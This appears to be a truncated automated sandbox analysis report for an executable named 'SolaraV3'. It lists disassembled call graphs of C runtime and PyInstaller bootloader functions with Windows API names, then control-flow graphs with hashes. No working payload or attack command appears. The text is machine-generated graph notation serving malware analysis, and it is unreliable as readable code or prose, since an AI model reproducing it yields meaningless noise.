LeaveCriticalSection 19977->19980 19768 7ff6dc72adfe 19769 7ff6dc72ae17 19768->19769 19770 7ff6dc72ae0d 19768->19770 19772 7ff6dc720338 LeaveCriticalSection 19770->19772 20068 7ff6dc71f98c 20069 7ff6dc71fb7e 20068->20069 20071 7ff6dc71f9ce _isindst 20068->20071 20070 7ff6dc714f08 _set_fmode 11 API calls 20069->20070 20088 7ff6dc71fb6e 20070->20088 20071->20069 20074 7ff6dc71fa4e _isindst 20071->20074 20072 7ff6dc70c550 _log10_special 8 API calls 20073 7ff6dc71fb99 20072->20073 20089 7ff6dc726194 20074->20089 20079 7ff6dc71fbaa 20080 7ff6dc71a900 _isindst 17 API calls 20079->20080 20082 7ff6dc71fbbe 20080->20082 20086 7ff6dc71faab 20086->20088 20114 7ff6dc7261d8 20086->20114 20088->20072 20090 7ff6dc71fa6c 20089->20090 20091 7ff6dc7261a3 20089->20091 20096 7ff6dc725598 20090->20096 20121 7ff6dc7202d8 EnterCriticalSection 20091->20121 20097 7ff6dc71fa81 20096->20097 20098 7ff6dc7255a1 20096->20098 20097->20079 20102 7ff6dc7255c8 20097->20102 20099 7ff6dc714f08 _set_fmode 11 API calls 20098->20099 20100 7ff6dc7255a6 20099->20100 20101 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 20100->20101 20101->20097 20103 7ff6dc71fa92 20102->20103 20104 7ff6dc7255d1 20102->20104 20103->20079 20108 7ff6dc7255f8 20103->20108 20105 7ff6dc714f08 _set_fmode 11 API calls 20104->20105 20106 7ff6dc7255d6 20105->20106 20107 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 20106->20107 20107->20103 20109 7ff6dc725601 20108->20109 20113 7ff6dc71faa3 20108->20113 20110 7ff6dc714f08 _set_fmode 11 API calls 20109->20110 20111 7ff6dc725606 20110->20111 20112 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 20111->20112 20112->20113 20113->20079 20113->20086 20122 7ff6dc7202d8 EnterCriticalSection 20114->20122 19782 7ff6dc715410 19783 7ff6dc71541b 19782->19783 19791 7ff6dc71f2a4 19783->19791 19804 7ff6dc7202d8 EnterCriticalSection 19791->19804 20212 7ff6dc71c520 20223 7ff6dc7202d8 EnterCriticalSection 20212->20223 16036 7ff6dc715628 16037 7ff6dc71565f 16036->16037 16038 7ff6dc715642 16036->16038 16037->16038 16039 7ff6dc715672 CreateFileW 16037->16039 16061 7ff6dc714ee8 16038->16061 16041 7ff6dc7156a6 16039->16041 16042 7ff6dc7156dc 16039->16042 16070 7ff6dc71577c GetFileType 16041->16070 16096 7ff6dc715c04 16042->16096 16051 7ff6dc7156bb CloseHandle 16057 7ff6dc71565a 16051->16057 16052 7ff6dc7156d1 CloseHandle 16052->16057 16053 7ff6dc715710 16122 7ff6dc7159c4 16053->16122 16054 7ff6dc7156e5 16117 7ff6dc714e7c 16054->16117 16060 7ff6dc7156ef 16060->16057 16139 7ff6dc71b2c8 GetLastError 16061->16139 16063 7ff6dc714ef1 16064 7ff6dc714f08 16063->16064 16065 7ff6dc71b2c8 _set_fmode 11 API calls 16064->16065 16066 7ff6dc714f11 16065->16066 16067 7ff6dc71a8e0 16066->16067 16197 7ff6dc71a778 16067->16197 16069 7ff6dc71a8f9 16069->16057 16071 7ff6dc715887 16070->16071 16072 7ff6dc7157ca 16070->16072 16074 7ff6dc71588f 16071->16074 16075 7ff6dc7158b1 16071->16075 16073 7ff6dc7157f6 GetFileInformationByHandle 16072->16073 16077 7ff6dc715b00 21 API calls 16072->16077 16078 7ff6dc71581f 16073->16078 16079 7ff6dc7158a2 GetLastError 16073->16079 16074->16079 16080 7ff6dc715893 16074->16080 16076 7ff6dc7158d4 PeekNamedPipe 16075->16076 16095 7ff6dc715872 16075->16095 16076->16095 16081 7ff6dc7157e4 16077->16081 16082 7ff6dc7159c4 51 API calls 16078->16082 16084 7ff6dc714e7c _fread_nolock 11 API calls 16079->16084 16083 7ff6dc714f08 _set_fmode 11 API calls 16080->16083 16081->16073 16081->16095 16086 7ff6dc71582a 16082->16086 16083->16095 16084->16095 16085 7ff6dc70c550 _log10_special 8 API calls 16087 7ff6dc7156b4 16085->16087 16263 7ff6dc715924 16086->16263 16087->16051 16087->16052 16090 7ff6dc715924 10 API calls 16091 7ff6dc715849 16090->16091 16092 7ff6dc715924 10 API calls 16091->16092 16093 7ff6dc71585a 16092->16093 16094 7ff6dc714f08 _set_fmode 11 API calls 16093->16094 16093->16095 16094->16095 16095->16085 16097 7ff6dc715c3a 16096->16097 16098 7ff6dc715cd2 __std_exception_destroy 16097->16098 16099 7ff6dc714f08 _set_fmode 11 API calls 16097->16099 16100 7ff6dc70c550 _log10_special 8 API calls 16098->16100 16101 7ff6dc715c4c 16099->16101 16102 7ff6dc7156e1 16100->16102 16103 7ff6dc714f08 _set_fmode 11 API calls 16101->16103 16102->16053 16102->16054 16104 7ff6dc715c54 16103->16104 16270 7ff6dc717e08 16104->16270 16106 7ff6dc715c69 16107 7ff6dc715c7b 16106->16107 16108 7ff6dc715c71 16106->16108 16110 7ff6dc714f08 _set_fmode 11 API calls 16107->16110 16109 7ff6dc714f08 _set_fmode 11 API calls 16108->16109 16114 7ff6dc715c76 16109->16114 16111 7ff6dc715c80 16110->16111 16111->16098 16112 7ff6dc714f08 _set_fmode 11 API calls 16111->16112 16113 7ff6dc715c8a 16112->16113 16115 7ff6dc717e08 45 API calls 16113->16115 16114->16098 16116 7ff6dc715cc4 GetDriveTypeW 16114->16116 16115->16114 16116->16098 16118 7ff6dc71b2c8 _set_fmode 11 API calls 16117->16118 16119 7ff6dc714e89 Concurrency::details::SchedulerProxy::DeleteThis 16118->16119 16120 7ff6dc71b2c8 _set_fmode 11 API calls 16119->16120 16121 7ff6dc714eab 16120->16121 16121->16060 16124 7ff6dc7159ec 16122->16124 16123 7ff6dc71571d 16132 7ff6dc715b00 16123->16132 16124->16123 16364 7ff6dc71f724 16124->16364 16126 7ff6dc715a80 16126->16123 16127 7ff6dc71f724 51 API calls 16126->16127 16128 7ff6dc715a93 16127->16128 16128->16123 16129 7ff6dc71f724 51 API calls 16128->16129 16130 7ff6dc715aa6 16129->16130 16130->16123 16131 7ff6dc71f724 51 API calls 16130->16131 16131->16123 16133 7ff6dc715b1a 16132->16133 16134 7ff6dc715b51 16133->16134 16135 7ff6dc715b2a 16133->16135 16136 7ff6dc71f5b8 21 API calls 16134->16136 16137 7ff6dc714e7c _fread_nolock 11 API calls 16135->16137 16138 7ff6dc715b3a 16135->16138 16136->16138 16137->16138 16138->16060 16140 7ff6dc71b309 FlsSetValue 16139->16140 16145 7ff6dc71b2ec 16139->16145 16141 7ff6dc71b2f9 SetLastError 16140->16141 16142 7ff6dc71b31b 16140->16142 16141->16063 16156 7ff6dc71eb98 16142->16156 16145->16140 16145->16141 16147 7ff6dc71b348 FlsSetValue 16150 7ff6dc71b366 16147->16150 16151 7ff6dc71b354 FlsSetValue 16147->16151 16148 7ff6dc71b338 FlsSetValue 16149 7ff6dc71b341 16148->16149 16163 7ff6dc71a948 16149->16163 16169 7ff6dc71aef4 16150->16169 16151->16149 16161 7ff6dc71eba9 _set_fmode 16156->16161 16157 7ff6dc71ebfa 16160 7ff6dc714f08 _set_fmode 10 API calls 16157->16160 16158 7ff6dc71ebde HeapAlloc 16159 7ff6dc71b32a 16158->16159 16158->16161 16159->16147 16159->16148 16160->16159 16161->16157 16161->16158 16174 7ff6dc723590 16161->16174 16164 7ff6dc71a94d RtlFreeHeap 16163->16164 16168 7ff6dc71a97c 16163->16168 16165 7ff6dc71a968 GetLastError 16164->16165 16164->16168 16166 7ff6dc71a975 Concurrency::details::SchedulerProxy::DeleteThis 16165->16166 16167 7ff6dc714f08 _set_fmode 9 API calls 16166->16167 16167->16168 16168->16141 16183 7ff6dc71adcc 16169->16183 16177 7ff6dc7235d0 16174->16177 16182 7ff6dc7202d8 EnterCriticalSection 16177->16182 16195 7ff6dc7202d8 EnterCriticalSection 16183->16195 16198 7ff6dc71a7a3 16197->16198 16201 7ff6dc71a814 16198->16201 16200 7ff6dc71a7ca 16200->16069 16211 7ff6dc71a55c 16201->16211 16204 7ff6dc71a84f 16204->16200 16212 7ff6dc71a578 GetLastError 16211->16212 16213 7ff6dc71a5b3 16211->16213 16214 7ff6dc71a588 16212->16214 16213->16204 16217 7ff6dc71a5c8 16213->16217 16224 7ff6dc71b390 16214->16224 16218 7ff6dc71a5e4 GetLastError SetLastError 16217->16218 16219 7ff6dc71a5fc 16217->16219 16218->16219 16219->16204 16220 7ff6dc71a900 IsProcessorFeaturePresent 16219->16220 16221 7ff6dc71a913 16220->16221 16241 7ff6dc71a614 16221->16241 16225 7ff6dc71b3ca FlsSetValue 16224->16225 16226 7ff6dc71b3af FlsGetValue 16224->16226 16228 7ff6dc71b3d7 16225->16228 16230 7ff6dc71a5a3 SetLastError 16225->16230 16227 7ff6dc71b3c4 16226->16227 16226->16230 16227->16225 16229 7ff6dc71eb98 _set_fmode 11 API calls 16228->16229 16231 7ff6dc71b3e6 16229->16231 16230->16213 16232 7ff6dc71b404 FlsSetValue 16231->16232 16233 7ff6dc71b3f4 FlsSetValue 16231->16233 16235 7ff6dc71b410 FlsSetValue 16232->16235 16236 7ff6dc71b422 16232->16236 16234 7ff6dc71b3fd 16233->16234 16237 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16234->16237 16235->16234 16238 7ff6dc71aef4 _set_fmode 11 API calls 16236->16238 16237->16230 16239 7ff6dc71b42a 16238->16239 16240 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16239->16240 16240->16230 16242 7ff6dc71a64e __CxxCallCatchBlock __scrt_get_show_window_mode 16241->16242 16243 7ff6dc71a676 RtlCaptureContext RtlLookupFunctionEntry 16242->16243 16244 7ff6dc71a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16243->16244 16245 7ff6dc71a6b0 RtlVirtualUnwind 16243->16245 16246 7ff6dc71a738 __CxxCallCatchBlock 16244->16246 16245->16244 16249 7ff6dc70c550 16246->16249 16250 7ff6dc70c559 16249->16250 16251 7ff6dc70c564 GetCurrentProcess TerminateProcess 16250->16251 16252 7ff6dc70c8e0 IsProcessorFeaturePresent 16250->16252 16253 7ff6dc70c8f8 16252->16253 16258 7ff6dc70cad8 RtlCaptureContext 16253->16258 16259 7ff6dc70caf2 RtlLookupFunctionEntry 16258->16259 16260 7ff6dc70cb08 RtlVirtualUnwind 16259->16260 16261 7ff6dc70c90b 16259->16261 16260->16259 16260->16261 16262 7ff6dc70c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16261->16262 16264 7ff6dc71594d FileTimeToSystemTime 16263->16264 16265 7ff6dc715940 16263->16265 16266 7ff6dc715961 SystemTimeToTzSpecificLocalTime 16264->16266 16268 7ff6dc715948 16264->16268 16265->16264 16265->16268 16266->16268 16267 7ff6dc70c550 _log10_special 8 API calls 16269 7ff6dc715839 16267->16269 16268->16267 16269->16090 16271 7ff6dc717e92 16270->16271 16272 7ff6dc717e24 16270->16272 16307 7ff6dc7207c0 16271->16307 16272->16271 16274 7ff6dc717e29 16272->16274 16275 7ff6dc717e5e 16274->16275 16276 7ff6dc717e41 16274->16276 16290 7ff6dc717c4c GetFullPathNameW 16275->16290 16282 7ff6dc717bd8 GetFullPathNameW 16276->16282 16281 7ff6dc717e56 __std_exception_destroy 16281->16106 16283 7ff6dc717bfe GetLastError 16282->16283 16284 7ff6dc717c14 16282->16284 16285 7ff6dc714e7c _fread_nolock 11 API calls 16283->16285 16287 7ff6dc714f08 _set_fmode 11 API calls 16284->16287 16289 7ff6dc717c10 16284->16289 16286 7ff6dc717c0b 16285->16286 16288 7ff6dc714f08 _set_fmode 11 API calls 16286->16288 16287->16289 16288->16289 16289->16281 16291 7ff6dc717c7f GetLastError 16290->16291 16296 7ff6dc717c95 __std_exception_destroy 16290->16296 16292 7ff6dc714e7c _fread_nolock 11 API calls 16291->16292 16293 7ff6dc717c8c 16292->16293 16294 7ff6dc714f08 _set_fmode 11 API calls 16293->16294 16295 7ff6dc717c91 16294->16295 16298 7ff6dc717d24 16295->16298 16296->16295 16297 7ff6dc717cef GetFullPathNameW 16296->16297 16297->16291 16297->16295 16301 7ff6dc717d98 memcpy_s 16298->16301 16302 7ff6dc717d4d __scrt_get_show_window_mode 16298->16302 16299 7ff6dc717d81 16300 7ff6dc714f08 _set_fmode 11 API calls 16299->16300 16306 7ff6dc717d86 16300->16306 16301->16281 16302->16299 16302->16301 16304 7ff6dc717dba 16302->16304 16303 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16303->16301 16304->16301 16305 7ff6dc714f08 _set_fmode 11 API calls 16304->16305 16305->16306 16306->16303 16310 7ff6dc7205d0 16307->16310 16311 7ff6dc7205fb 16310->16311 16312 7ff6dc720612 16310->16312 16313 7ff6dc714f08 _set_fmode 11 API calls 16311->16313 16314 7ff6dc720637 16312->16314 16315 7ff6dc720616 16312->16315 16329 7ff6dc720600 16313->16329 16348 7ff6dc71f5b8 16314->16348 16336 7ff6dc72073c 16315->16336 16318 7ff6dc72063c 16324 7ff6dc7206e1 16318->16324 16331 7ff6dc720663 16318->16331 16320 7ff6dc72061f 16322 7ff6dc714ee8 _fread_nolock 11 API calls 16320->16322 16321 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16335 7ff6dc72060b __std_exception_destroy 16321->16335 16323 7ff6dc720624 16322->16323 16326 7ff6dc714f08 _set_fmode 11 API calls 16323->16326 16324->16311 16327 7ff6dc7206e9 16324->16327 16325 7ff6dc70c550 _log10_special 8 API calls 16328 7ff6dc720731 16325->16328 16326->16329 16330 7ff6dc717bd8 13 API calls 16327->16330 16328->16281 16329->16321 16330->16335 16332 7ff6dc717c4c 14 API calls 16331->16332 16333 7ff6dc7206a7 16332->16333 16334 7ff6dc717d24 37 API calls 16333->16334 16333->16335 16334->16335 16335->16325 16337 7ff6dc720786 16336->16337 16338 7ff6dc720756 16336->16338 16339 7ff6dc720771 16337->16339 16340 7ff6dc720791 GetDriveTypeW 16337->16340 16341 7ff6dc714ee8 _fread_nolock 11 API calls 16338->16341 16343 7ff6dc70c550 _log10_special 8 API calls 16339->16343 16340->16339 16342 7ff6dc72075b 16341->16342 16344 7ff6dc714f08 _set_fmode 11 API calls 16342->16344 16346 7ff6dc72061b 16343->16346 16345 7ff6dc720766 16344->16345 16347 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16345->16347 16346->16318 16346->16320 16347->16339 16362 7ff6dc72a4d0 16348->16362 16351 7ff6dc71f62c 16353 7ff6dc71eb98 _set_fmode 11 API calls 16351->16353 16352 7ff6dc71f605 16354 7ff6dc70c550 _log10_special 8 API calls 16352->16354 16355 7ff6dc71f63b 16353->16355 16356 7ff6dc71f699 16354->16356 16357 7ff6dc71f645 GetCurrentDirectoryW 16355->16357 16358 7ff6dc71f654 16355->16358 16356->16318 16357->16358 16359 7ff6dc71f659 16357->16359 16360 7ff6dc714f08 _set_fmode 11 API calls 16358->16360 16361 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16359->16361 16360->16359 16361->16352 16363 7ff6dc71f5ee GetCurrentDirectoryW 16362->16363 16363->16351 16363->16352 16365 7ff6dc71f755 16364->16365 16366 7ff6dc71f731 16364->16366 16368 7ff6dc71f78f 16365->16368 16372 7ff6dc71f7ae 16365->16372 16366->16365 16367 7ff6dc71f736 16366->16367 16369 7ff6dc714f08 _set_fmode 11 API calls 16367->16369 16371 7ff6dc714f08 _set_fmode 11 API calls 16368->16371 16370 7ff6dc71f73b 16369->16370 16373 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16370->16373 16374 7ff6dc71f794 16371->16374 16381 7ff6dc714f4c 16372->16381 16377 7ff6dc71f746 16373->16377 16378 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16374->16378 16376 7ff6dc71f7bb 16379 7ff6dc71f79f 16376->16379 16380 7ff6dc7204dc 51 API calls 16376->16380 16377->16126 16378->16379 16379->16126 16380->16376 16382 7ff6dc714f6b 16381->16382 16383 7ff6dc714f70 16381->16383 16382->16376 16383->16382 16389 7ff6dc71b150 GetLastError 16383->16389 16390 7ff6dc71b191 FlsSetValue 16389->16390 16391 7ff6dc71b174 FlsGetValue 16389->16391 16393 7ff6dc71b1a3 16390->16393 16408 7ff6dc71b181 16390->16408 16392 7ff6dc71b18b 16391->16392 16391->16408 16392->16390 16395 7ff6dc71eb98 _set_fmode 11 API calls 16393->16395 16394 7ff6dc71b1fd SetLastError 16396 7ff6dc714f8b 16394->16396 16397 7ff6dc71b21d 16394->16397 16398 7ff6dc71b1b2 16395->16398 16411 7ff6dc71d984 16396->16411 16419 7ff6dc71a504 16397->16419 16400 7ff6dc71b1d0 FlsSetValue 16398->16400 16401 7ff6dc71b1c0 FlsSetValue 16398->16401 16402 7ff6dc71b1dc FlsSetValue 16400->16402 16403 7ff6dc71b1ee 16400->16403 16405 7ff6dc71b1c9 16401->16405 16402->16405 16406 7ff6dc71aef4 _set_fmode 11 API calls 16403->16406 16407 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16405->16407 16409 7ff6dc71b1f6 16406->16409 16407->16408 16408->16394 16410 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16409->16410 16410->16394 16412 7ff6dc71d999 16411->16412 16414 7ff6dc714fae 16411->16414 16412->16414 16463 7ff6dc723304 16412->16463 16415 7ff6dc71d9f0 16414->16415 16416 7ff6dc71da05 16415->16416 16418 7ff6dc71da18 16415->16418 16416->16418 16476 7ff6dc722650 16416->16476 16418->16382 16428 7ff6dc723650 16419->16428 16454 7ff6dc723608 16428->16454 16459 7ff6dc7202d8 EnterCriticalSection 16454->16459 16464 7ff6dc71b150 __CxxCallCatchBlock 45 API calls 16463->16464 16465 7ff6dc723313 16464->16465 16466 7ff6dc72335e 16465->16466 16475 7ff6dc7202d8 EnterCriticalSection 16465->16475 16466->16414 16477 7ff6dc71b150 __CxxCallCatchBlock 45 API calls 16476->16477 16478 7ff6dc722659 16477->16478 20761 7ff6dc7216b0 20772 7ff6dc7273e4 20761->20772 20773 7ff6dc7273f1 20772->20773 20774 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20773->20774 20775 7ff6dc72740d 20773->20775 20774->20773 20776 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20775->20776 20777 7ff6dc7216b9 20775->20777 20776->20775 20778 7ff6dc7202d8 EnterCriticalSection 20777->20778

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff6dc7089e0-7ff6dc708b26 call 7ff6dc70c850 call 7ff6dc709390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6dc7153f0 call 7ff6dc71a47c call 7ff6dc71871c call 7ff6dc7153f0 call 7ff6dc71a47c call 7ff6dc71871c call 7ff6dc7153f0 call 7ff6dc71a47c call 7ff6dc71871c GetCommandLineW CreateProcessW 23 7ff6dc708b28-7ff6dc708b48 GetLastError call 7ff6dc702c50 0->23 24 7ff6dc708b4d-7ff6dc708b89 RegisterClassW 0->24 31 7ff6dc708e39-7ff6dc708e5f call 7ff6dc70c550 23->31 26 7ff6dc708b8b GetLastError 24->26 27 7ff6dc708b91-7ff6dc708be5 CreateWindowExW 24->27 26->27 29 7ff6dc708be7-7ff6dc708bed GetLastError 27->29 30 7ff6dc708bef-7ff6dc708bf4 ShowWindow 27->30 32 7ff6dc708bfa-7ff6dc708c0a WaitForSingleObject 29->32 30->32 34 7ff6dc708c88-7ff6dc708c8f 32->34 35 7ff6dc708c0c 32->35 36 7ff6dc708c91-7ff6dc708ca1 WaitForSingleObject 34->36 37 7ff6dc708cd2-7ff6dc708cd9 34->37 39 7ff6dc708c10-7ff6dc708c13 35->39 42 7ff6dc708ca7-7ff6dc708cb7 TerminateProcess 36->42 43 7ff6dc708df8-7ff6dc708e02 36->43 44 7ff6dc708cdf-7ff6dc708cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->44 45 7ff6dc708dc0-7ff6dc708dd9 GetMessageW 37->45 40 7ff6dc708c1b-7ff6dc708c22 39->40 41 7ff6dc708c15 GetLastError 39->41 40->36 46 7ff6dc708c24-7ff6dc708c41 PeekMessageW 40->46 41->40 51 7ff6dc708cb9 GetLastError 42->51 52 7ff6dc708cbf-7ff6dc708ccd WaitForSingleObject 42->52 49 7ff6dc708e11-7ff6dc708e35 GetExitCodeProcess CloseHandle * 2 43->49 50 7ff6dc708e04-7ff6dc708e0a DestroyWindow 43->50 53 7ff6dc708d00-7ff6dc708d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff6dc708ddb-7ff6dc708de9 TranslateMessage DispatchMessageW 45->47 48 7ff6dc708def-7ff6dc708df6 45->48 54 7ff6dc708c76-7ff6dc708c86 WaitForSingleObject 46->54 55 7ff6dc708c43-7ff6dc708c74 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->43 48->45 49->31 50->49 51->52 52->43 56 7ff6dc708d3a 53->56 57 7ff6dc708d73-7ff6dc708d7a 53->57 54->34 54->39 55->54 55->55 59 7ff6dc708d40-7ff6dc708d71 TranslateMessage DispatchMessageW PeekMessageW 56->59 57->45 58 7ff6dc708d7c-7ff6dc708da5 QueryPerformanceCounter 57->58 58->53 60 7ff6dc708dab-7ff6dc708db2 58->60 59->57 59->59 60->43 61 7ff6dc708db4-7ff6dc708db8 60->61 61->45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction ID: 1bff4179a1be7ff1bc58e4b5cef247cd99b3322a71b3d108e5b5ec61d38f45b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94D18731A08B8A86EB209F75E8642AD7770FF84758F500237DA5E83A95DF3CD566D700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff6dc701000-7ff6dc703806 call 7ff6dc70fe18 call 7ff6dc70fe20 call 7ff6dc70c850 call 7ff6dc7153f0 call 7ff6dc715484 call 7ff6dc7036b0 76 7ff6dc703814-7ff6dc703836 call 7ff6dc701950 62->76 77 7ff6dc703808-7ff6dc70380f 62->77 83 7ff6dc70383c-7ff6dc703856 call 7ff6dc701c80 76->83 84 7ff6dc70391b-7ff6dc703931 call 7ff6dc7045c0 76->84 78 7ff6dc703c97-7ff6dc703cb2 call 7ff6dc70c550 77->78 88 7ff6dc70385b-7ff6dc70389b call 7ff6dc708830 83->88 89 7ff6dc703933-7ff6dc703960 call 7ff6dc707f90 84->89 90 7ff6dc70396a-7ff6dc70397f call 7ff6dc702710 84->90 97 7ff6dc7038c1-7ff6dc7038cc call 7ff6dc714f30 88->97 98 7ff6dc70389d-7ff6dc7038a3 88->98 100 7ff6dc703984-7ff6dc7039a6 call 7ff6dc701c80 89->100 101 7ff6dc703962-7ff6dc703965 call 7ff6dc71004c 89->101 102 7ff6dc703c8f 90->102 110 7ff6dc7038d2-7ff6dc7038e1 call 7ff6dc708830 97->110 111 7ff6dc7039fc-7ff6dc703a2a call 7ff6dc708940 call 7ff6dc7089a0 * 3 97->111 103 7ff6dc7038a5-7ff6dc7038ad 98->103 104 7ff6dc7038af-7ff6dc7038bd call 7ff6dc7089a0 98->104 115 7ff6dc7039b0-7ff6dc7039b9 100->115 101->90 102->78 103->104 104->97 119 7ff6dc7039f4-7ff6dc7039f7 call 7ff6dc714f30 110->119 120 7ff6dc7038e7-7ff6dc7038ed 110->120 138 7ff6dc703a2f-7ff6dc703a3e call 7ff6dc708830 111->138 115->115 118 7ff6dc7039bb-7ff6dc7039d8 call 7ff6dc701950 115->118 118->88 127 7ff6dc7039de-7ff6dc7039ef call 7ff6dc702710 118->127 119->111 124 7ff6dc7038f0-7ff6dc7038fc 120->124 128 7ff6dc703905-7ff6dc703908 124->128 129 7ff6dc7038fe-7ff6dc703903 124->129 127->102 128->119 132 7ff6dc70390e-7ff6dc703916 call 7ff6dc714f30 128->132 129->124 129->128 132->138 141 7ff6dc703b45-7ff6dc703b53 138->141 142 7ff6dc703a44-7ff6dc703a47 138->142 144 7ff6dc703b59-7ff6dc703b5d 141->144 145 7ff6dc703a67 141->145 142->141 143 7ff6dc703a4d-7ff6dc703a50 142->143 146 7ff6dc703b14-7ff6dc703b17 143->146 147 7ff6dc703a56-7ff6dc703a5a 143->147 148 7ff6dc703a6b-7ff6dc703a90 call 7ff6dc714f30 144->148 145->148 150 7ff6dc703b2f-7ff6dc703b40 call 7ff6dc702710 146->150 151 7ff6dc703b19-7ff6dc703b1d 146->151 147->146 149 7ff6dc703a60 147->149 157 7ff6dc703a92-7ff6dc703aa6 call 7ff6dc708940 148->157 158 7ff6dc703aab-7ff6dc703ac0 148->158 149->145 159 7ff6dc703c7f-7ff6dc703c87 150->159 151->150 153 7ff6dc703b1f-7ff6dc703b2a 151->153 153->148 157->158 161 7ff6dc703be8-7ff6dc703bfa call 7ff6dc708830 158->161 162 7ff6dc703ac6-7ff6dc703aca 158->162 159->102 170 7ff6dc703c2e 161->170 171 7ff6dc703bfc-7ff6dc703c02 161->171 164 7ff6dc703ad0-7ff6dc703ae8 call 7ff6dc715250 162->164 165 7ff6dc703bcd-7ff6dc703be2 call 7ff6dc701940 162->165 176 7ff6dc703b62-7ff6dc703b7a call 7ff6dc715250 164->176 177 7ff6dc703aea-7ff6dc703b02 call 7ff6dc715250 164->177 165->161 165->162 173 7ff6dc703c31-7ff6dc703c40 call 7ff6dc714f30 170->173 174 7ff6dc703c04-7ff6dc703c1c 171->174 175 7ff6dc703c1e-7ff6dc703c2c 171->175 185 7ff6dc703d41-7ff6dc703d63 call 7ff6dc7044e0 173->185 186 7ff6dc703c46-7ff6dc703c4a 173->186 174->173 175->173 187 7ff6dc703b7c-7ff6dc703b80 176->187 188 7ff6dc703b87-7ff6dc703b9f call 7ff6dc715250 176->188 177->165 184 7ff6dc703b08-7ff6dc703b0f 177->184 184->165 201 7ff6dc703d65-7ff6dc703d6f call 7ff6dc704630 185->201 202 7ff6dc703d71-7ff6dc703d82 call 7ff6dc701c80 185->202 190 7ff6dc703cd4-7ff6dc703ce6 call 7ff6dc708830 186->190 191 7ff6dc703c50-7ff6dc703c5f call 7ff6dc7090e0 186->191 187->188 197 7ff6dc703ba1-7ff6dc703ba5 188->197 198 7ff6dc703bac-7ff6dc703bc4 call 7ff6dc715250 188->198 206 7ff6dc703d35-7ff6dc703d3c 190->206 207 7ff6dc703ce8-7ff6dc703ceb 190->207 204 7ff6dc703cb3-7ff6dc703cb6 call 7ff6dc708660 191->204 205 7ff6dc703c61 191->205 197->198 198->165 217 7ff6dc703bc6 198->217 215 7ff6dc703d87-7ff6dc703d96 201->215 202->215 216 7ff6dc703cbb-7ff6dc703cbd 204->216 212 7ff6dc703c68 call 7ff6dc702710 205->212 206->212 207->206 213 7ff6dc703ced-7ff6dc703d10 call 7ff6dc701c80 207->213 226 7ff6dc703c6d-7ff6dc703c77 212->226 230 7ff6dc703d12-7ff6dc703d26 call 7ff6dc702710 call 7ff6dc714f30 213->230 231 7ff6dc703d2b-7ff6dc703d33 call 7ff6dc714f30 213->231 220 7ff6dc703dbc-7ff6dc703dd2 call 7ff6dc709390 215->220 221 7ff6dc703d98-7ff6dc703d9f 215->221 224 7ff6dc703cbf-7ff6dc703cc6 216->224 225 7ff6dc703cc8-7ff6dc703ccf 216->225 217->165 233 7ff6dc703dd4 220->233 234 7ff6dc703de0-7ff6dc703dfc SetDllDirectoryW 220->234 221->220 222 7ff6dc703da1-7ff6dc703da5 